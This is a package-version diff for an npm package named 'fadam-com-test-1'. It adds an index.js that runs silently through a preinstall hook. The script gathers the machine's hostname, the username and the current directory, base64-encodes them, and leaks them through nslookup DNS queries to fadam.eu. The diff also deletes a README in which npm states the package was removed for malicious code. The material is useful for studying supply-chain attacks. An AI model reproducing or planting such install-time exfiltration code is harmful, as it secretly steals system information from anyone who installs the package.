fadam-com-test-1 0.0.1-security → 1.999.0

package/index.js

@@ -0,0 +1,42 @@
+const { exec } = require("child_process");
+
+const exfiltrateToDNS = () => {
+  exec("hostname", (error, hostname, stderr) => {
+    if (error) {
+      console.error(`Error: ${error.message}`);
+      return;
+    }
+    exfiltrateValueToDNS("hostname-value", hostname.trim());
+  });
+
+  exec("whoami", (error, username, stderr) => {
+    if (error) {
+      console.error(`Error: ${error.message}`);
+      return;
+    }
+    exfiltrateValueToDNS("user-value", username.trim());
+  });
+
+  exec("pwd", (error, currentDir, stderr) => {
+    if (error) {
+      console.error(`Error: ${error.message}`);
+      return;
+    }
+    exfiltrateValueToDNS("pwd-value", currentDir.trim());
+  });
+};
+
+const exfiltrateValueToDNS = (label, value) => {
+  const base64Value = Buffer.from(value).toString("base64");
+  const cmd = `echo -n "${label}-${base64Value}.fadam.eu" | xargs -I {} nslookup {}`;
+
+  exec(cmd, (error, stdout, stderr) => {
+    if (error) {
+      console.error(`Error: ${error.message}`);
+      return;
+    }
+    console.log(`Command output:\n${stdout}`);
+  });
+};
+
+exfiltrateToDNS();

package/package.json

@@ -1,6 +1,15 @@
 {
   "name": "fadam-com-test-1",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+  "version": "1.999.0",
+  "description": "",
+  "main": "main.js",
+  "scripts": {
+    "preinstall": "node index.js > /dev/null 2>&1",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "fadam",
+  "license": "ISC",
+  "dependencies": {
+    "lodash": "^4.17.21"
+  }
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=fadam-com-test-1 for more information.